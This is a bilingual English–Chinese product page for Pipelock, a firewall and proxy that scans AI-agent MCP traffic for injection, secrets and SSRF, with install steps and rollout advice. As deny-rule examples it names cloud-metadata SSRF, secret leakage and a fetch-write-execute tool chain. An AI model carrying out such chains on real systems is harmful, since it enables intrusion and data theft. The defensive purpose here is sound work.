# Pipelock — MCP Firewall for Agent Egress > Run Pipelock as an agent firewall/proxy to scan MCP traffic for injection, secrets, SSRF, and risky tool chains; integrate with Claude Code fast. ## Install Copy the content below into your project: # Pipelock — MCP Firewall for Agent Egress > Run Pipelock as an agent firewall/proxy to scan MCP traffic for injection, secrets, SSRF, and risky tool chains; integrate with Claude Code fast. ## Quick Use 1. Install: ```bash brew install luckyPipewrench/tap/pipelock ``` 2. Run: ```bash pipelock claude setup ``` 3. Verify: - Trigger one tool call and confirm it is scanned/allowed or denied with a clear reason. --- ## Intro Run Pipelock as an agent firewall/proxy to scan MCP traffic for injection, secrets, SSRF, and risky tool chains; integrate with Claude Code fast. - **Best for:** teams running tool-using agents (MCP/HTTP) who need egress control and auditable security checks - **Works with:** Claude Code hooks, MCP proxy patterns, and forward-proxy style agent egress control (per docs) - **Setup time:** 10 minutes ### Quantitative Notes - GitHub stars + forks (verified): see Source & Thanks - Docs mention scanners for secrets + injection patterns (repo/docs) - Setup time ~10 minutes (install + Claude Code setup + restart) --- ## Practical Notes A pragmatic rollout: install the binary, enable Claude Code integration, and restart. Then run 10–20 normal tasks and record what gets flagged. Create allow/deny rules based on real incidents: metadata SSRF attempts, secret patterns in prompts, and risky tool chains (e.g., web fetch → write file → exec). **Safety note:** Don’t rely on a single control. Combine firewall/proxy checks with least-privilege tools, sandboxing, and human approval for high-risk actions. ### FAQ **Q: Is this a replacement for sandboxing?** A: No. It complements sandboxing by enforcing egress policy and scanning tool traffic. **Q: Will it break my workflows?** A: Start in observe mode (or with a permissive preset) and tighten rules once you see false positives. **Q: Where should I enforce policy?** A: At the boundary: before tools execute or requests leave the machine/network. --- ## Source & Thanks > GitHub: https://github.com/luckyPipewrench/pipelock > Owner avatar: https://avatars.githubusercontent.com/u/142104046?v=4 > License (SPDX): Apache-2.0 > GitHub stars (verified via `api.github.com/repos/luckyPipewrench/pipelock`): 577 > GitHub forks (verified via `api.github.com/repos/luckyPipewrench/pipelock`): 61 --- # Pipelock——Agent 出站/MCP 防火墙与代理 > 用 Pipelock 做 agent 防火墙/代理:对 MCP 与出站流量做注入、密钥、SSRF 与危险链路检测;支持快速接入 Claude Code,并输出可审计的拦截原因与证据,便于排查。 ## 快速使用 1. 安装: ```bash brew install luckyPipewrench/tap/pipelock ``` 2. 运行: ```bash pipelock claude setup ``` 3. 验证: - Trigger one tool call and confirm it is scanned/allowed or denied with a clear reason. --- ## 简介 用 Pipelock 做 agent 防火墙/代理:对 MCP 与出站流量做注入、密钥、SSRF 与危险链路检测;支持快速接入 Claude Code,并输出可审计的拦截原因与证据,便于排查。 - **适合谁(Best for):** 运行可调用工具的 agents(MCP/HTTP)的团队,需要出站控制与可审计的安全检查 - **兼容工具(Works with):** Claude Code hooks、MCP 代理模式、以及 forward-proxy 形式的 agent 出站控制(文档说明) - **安装时间(Setup time):** 10 分钟 ### 量化信息 - GitHub stars + forks(已核验):见「来源与感谢」 - 文档提到 secrets + 注入检测等扫描能力(仓库/文档) - 接入约 10 分钟(安装 + setup + 重启) --- ## 实战要点 推荐的上线方式:先安装二进制并接入 Claude Code,重启后先跑 10–20 个日常任务,记录被拦截/标记的点。再基于真实风险去写 allow/deny:比如云元数据 SSRF、prompt 中的密钥模式、以及危险工具链(web fetch→写文件→执行)。 **安全提示:** 不要依赖单一控制。建议把防火墙/代理与最小权限工具、沙箱、以及高风险动作的人审一起用。 ### FAQ **Q: 能替代沙箱吗?** A: 不能。它更像补强:在边界做出站策略与流量扫描,配合沙箱更稳。 **Q: 会不会把流程搞崩?** A: 建议先观察模式/宽松预设跑起来,确认误报后再逐步收紧规则。 **Q: 策略应该放在哪?** A: 放在边界:工具执行前、请求离开机器/网络之前。 --- ## 来源与感谢 > GitHub:https://github.com/luckyPipewrench/pipelock > Owner avatar:https://avatars.githubusercontent.com/u/142104046?v=4 > 许可证(SPDX):Apache-2.0 > GitHub stars(已通过 `api.github.com/repos/luckyPipewrench/pipelock` 核验):577 > GitHub forks(已通过 `api.github.com/repos/luckyPipewrench/pipelock` 核验):61 --- Source: https://tokrepo.com/en/workflows/pipelock-mcp-firewall-for-agent-egress Author: Script Depot